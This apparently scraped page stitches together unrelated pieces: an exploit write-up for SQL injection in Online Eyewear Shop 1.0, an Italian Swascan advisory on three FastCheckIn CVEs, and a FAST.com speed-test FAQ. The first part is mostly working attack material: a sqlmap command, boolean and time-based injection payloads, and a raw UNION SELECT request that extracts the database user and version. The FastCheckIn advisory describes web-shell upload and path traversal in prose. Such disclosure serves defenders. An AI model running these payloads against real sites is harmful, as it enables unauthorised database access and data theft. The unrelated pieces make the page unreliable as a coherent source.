    # Exploit Title: Online Eyewear Shop 1.0 - Product detail 'id' SQL Injection (Unauthenticated)# Date: 2023-01-02# Exploit Author: Muhammad Navaid Zafar Ansari# Vendor Homepage: https://www.sourcecodester.com/php/16089/online-eyewear-shop-website-using-php-and-mysql-free-download.html# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-oews.zip# Version: 1.0# Tested on: Kali Linux + PHP 8.2.1, Apache 2.4.55 (Debian)# CVE: Not Assigned Yet# References: -------------------------------------------------------------------------------------1. Description:----------------------Online Eyewear Shop 1.0 allows Unauthenticated SQL Injection via parameter 'id' in 'oews/?p=products/view_product&id=?'  Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.2. Proof of Concept:----------------------Step 1 - By visiting the url: http://localhost/oews/?p=products/view_product&id=5 just add single quote to verify the SQL Injection.Step 2 - Run sqlmap -u "http://localhost/oews/?p=products/view_product&id=3" -p id --dbms=mysqlSQLMap Response:[*] starting @ 04:49:58 /2023-02-01/[04:49:58] [INFO] testing connection to the target URLyou have not declared cookie(s), while server wants to set its own ('PHPSESSID=ft4vh3vs87t...s4nu5kh7ik'). Do you want to use those [Y/n] nsqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: p=products/view_product&id=3' AND 4759=4759 AND 'oKly'='oKly    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: p=products/view_product&id=3' AND (SELECT 5509 FROM (SELECT(SLEEP(5)))KaYM) AND 'phDK'='phDK---[04:50:00] [INFO] testing MySQL[04:50:00] [INFO] confirming MySQL[04:50:00] [INFO] the back-end DBMS is MySQLweb server operating system: Linux Debianweb application technology: Apache 2.4.55, PHPback-end DBMS: MySQL >= 5.0.0 (MariaDB fork)3. Example payload:----------------------(boolean-based)' AND 1=1 AND 'test'='test4. Burpsuite request:----------------------GET /oews/?p=products/view_product&id=5%27+and+0+union+select+1,2,user(),4,5,6,7,8,9,10,11,12,version(),14--+- HTTP/1.1Host: localhostsec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=g491mrrn2ntmqa9akheqr3ujipConnection: close

Online Eyewear Shop 1.0 SQL Injection

An arbitrary file write vulnerability in Serenissima Informatica Fast Checkin v1.0 allows unauthenticated attackers to upload malicious files in the web root of the application to gain access to the server via the web shell.

L’ **Offensive Security Team** di **Swascan** ha identificato **3** vulnerabilità sul prodotto.

**Serenissima Informatica SpA**

_Serenissima Informatica è un’azienda che si occupa dello sviluppo di soluzioni per la gestione di PMI, Hotel e catene alberghiere, ristoranti e GDO._

**FastCheckIn – descrizione prodotto**

_Il prodotto FastCheckin (Web Check-In)_ in particolare aiuta gli utenti di Hotel e catene alberghiere nella compilazione dei propri dati e nella gestione delle proprie prenotazione online.

**Technical summary**

L’Offensive Security Team di Swascan ha identificato importanti vulnerabilià su: _FastCheckIn_:

**Vulnerabilità**

**CWE-ID**

**CVSSv3.1 Vector String**

**CVSSv3.1 Base Score**

**Arbitrary File Write (non autenticato)**

CWE-22

AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

**9.8 – Critical**

**SQL Injection (non autenticato)**

CWE-89

AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

**9.8 – Critical**

**Absolute/Relative Path Traversal (non autenticato)**

CWE-22

AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

**8.6 – High**

 Swascan ha scelto di non divulgare i dettagli tecnici della vulnerabilità.

Nella sezione seguente la Proof-of-Concept con evidenze offuscate sulle vulnerabilità riscontrate.

**Arbitrary File Write (non autenticato) – CVE-2022-47769****Descrizione**

L’applicazione risulta vulnerabile ad Arbitrary File Write. 

Un attaccante, remotamente e in modalità non autenticata, potrà scrivere nella web root dell’applicazione, qualsiasi file dal contenuto arbitrario per alterare e/o bloccare il funzionamento dell’applicativo oppure per ottenere l’accesso al server tramite web shell.

**Proof of Concept**

Si mostra di seguito come sia stato possibile scrivere una web shell nella web root dell’applicazione web ed ottenere accesso al server.

Per ottenere tale risultato sono stati effettuati i seguenti passaggi:

1.  Esecuzione di una HTTP Post Request per scrivere una WebShell (nell’esempio con il nome _70347276-ee93-4366-b396-e1496f67ed6d.aspx_ ) all’interno della web root;
2.  Esecuzione di comandi sul server tramite WebShell.

Evidenza 1 Richiesta HTTP contenente la WebShell

Il file C:\\\\FastCheckIn\\\\FastCI\\\\70347276-ee93-4366-b396-e1496f67ed6d.aspx è stato quindi creato con successo e raggiungibile dal web come mostrato nell’evidenza successiva:

Evidenza 2  Esecuzione tramite webshell del comando “whoami”

**Riferimenti**

https://cwe.mitre.org/data/definitions/20.html

http://cwe.mitre.org/data/definitions/22.html

https://owasp.org/www-community/attacks/Path\_Traversal

https://cheatsheetseries.owasp.org/cheatsheets/Input\_Validation\_Cheat\_Sheet.html

**SQL Injection (non autenticato) – CVE-2022-47770****Descrizione**

L’applicazione web è vulnerabile ad attacchi di tipo SQL Injection non autenticati.

Un potenziale attaccante sarà in grado accedere remotamente, completamente ed in maniera non autenticata alle informazioni contenute nella banca dati ed effettuare operazioni come esfiltrazione e modifica di account utente ed amministrativi, dati personali di utenti ed altre informazioni in essa contenute.

**Proof of Concept**

Si mostrano di seguito le evidenze della vulnerabilità e di come sia possibile estrarre informazioni sensibili dall’interno della banca dati.

Di seguito l’evidenza dell’enumerazione del DMBS, Microsoft SQL Server e la lista offuscata) di tutti i database presenti sul server:

Evidenza 4 SQLMap Lista database

Ciò conferma la presenza della vulnerabilità.

A fronte della corretta exploitation di questo tipo di vulnerabilità, un attaccante potrebbe acquisire i diritti di amministratore dell’applicativo web, con conseguente accesso a tutte le funzionalità del portale.

**Riferimenti**

https://www.owasp.org/index.php/SQL\_Injection

https://cwe.mitre.org/data/definitions/89.html

https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/SQL\_Injection\_Prevention\_Cheat\_Sheet.md

https://owasp.org/Top10/A03\_2021-Injection/

https://www.cve.org/CVERecord?id=CVE-2022-47770

**Path Traversal (non autenticato) – CVE-2022-47768****Descrizione**

La vulnerabilità Path Traversal (Relative e Absolute) consente l’accesso a file presenti nel sistema operativo che risiedono al di fuori della web root dell’applicazione. Manipolando le variabili che richiedono i file, attraverso l’uso dei caratteri “../” o di un path assoluto (eg. C:\\…) è possibile accedere arbitrariamente ai file e/o cartelle contenuti nel sistema operativo come il codice sorgente dell’applicazione o file sensibili che risiedono nella macchina.

**Proof of Concept**

Di seguito vengono mostrate le evidenze di come è possibile leggere il contenuto di file sul filesystem. Nell’esempio viene mostrata la possibilità di leggere il file c:\\windows\\win.ini:

Evidenza 5 Richiesta e Risposta HTTP della vulnerabilità Absolute Path Traversal

**Riferimenti**

https://cwe.mitre.org/data/definitions/22.html

https://cwe.mitre.org/data/definitions/23.html

https://owasp.org/Top10/A01\_2021-Broken\_Access\_Control/

https://owasp.org/www-community/attacks/Path\_Traversal

https://www.cve.org/CVERecord?id=CVE-2022-47768

**Remediation**

Swascan consiglia di non esporre l’applicativo su Internet o, qualora fosse necessario, di accedervi esclusivamente tramite connessione VPN in attesa che il vendor rilasci una patch o un aggiornamento.

**Disclosure Timeline**

*   07-08-2022: Scoperte le vulnerabilità
*   07-08-2022: Vendor contattato tramite mail (1° tentativo, nessuna risposta)
*   22-09-2022: Vendor contattato tramite mail (2° tentativo, con risposta)
*   22-09-2022: Invio del report contenente le vulnerabilità
*   11-01-2023: Swascan ricontatta il vendor per eventuale review del documento (nessuna risposta)
*   18-01-2023: Swasacan ricontatta il vendor per eventuale review (nessuna risposta)
*   31-01-2023: Swascan pubblica la vulnerabilità

CVE-2022-47769: Security Advisory: Serenissima Informatica – FastCheckIn (CVE-2022-47768/CVE-2022-47769/ CVE-2022-47770)

Serenissima Informatica Fast Checkin version v1.0 is vulnerable to Unauthenticated SQL Injection.

**What is FAST.com measuring?**

FAST.com speed test gives you an estimate of your current Internet speed. You will generally be able to get this speed from leading Internet services, which use globally distributed servers.

**Why does FAST.com focus primarily on download speed?**

Download speed is most relevant for people who are consuming content on the Internet, and we want FAST.com to be a very simple and fast speed test.

**What about ping, latency, upload and other things?**

When you click the “Show more info” button, you can see your upload speed and connection latency (ping). FAST.com provides two different latency measurements for your Internet connection: “unloaded” and “loaded” with traffic. The difference between these two measurements is also called “bufferbloat”.

**How are the results calculated?**

To calculate your Internet speed, FAST.com performs a series of downloads from and uploads to Netflix servers and calculates the maximum speed your Internet connection can provide. More details are in our blog post.

**Will the FAST.com speed test work everywhere in the world?**

FAST.com will test Internet speed globally on any device (phone, laptop, or smart TV with browser).

**Why is Netflix offering the FAST.com speed test?**

We want our members to have a simple, quick, ad-free way to estimate the Internet speed that their ISP is providing.

**What can I do if I'm not getting the speed I pay for?**

If results from FAST.com and other internet speed tests (like dslreports.com or speedtest.net) often show less speed than you have paid for, you can ask your ISP about the results.

Tag

#sql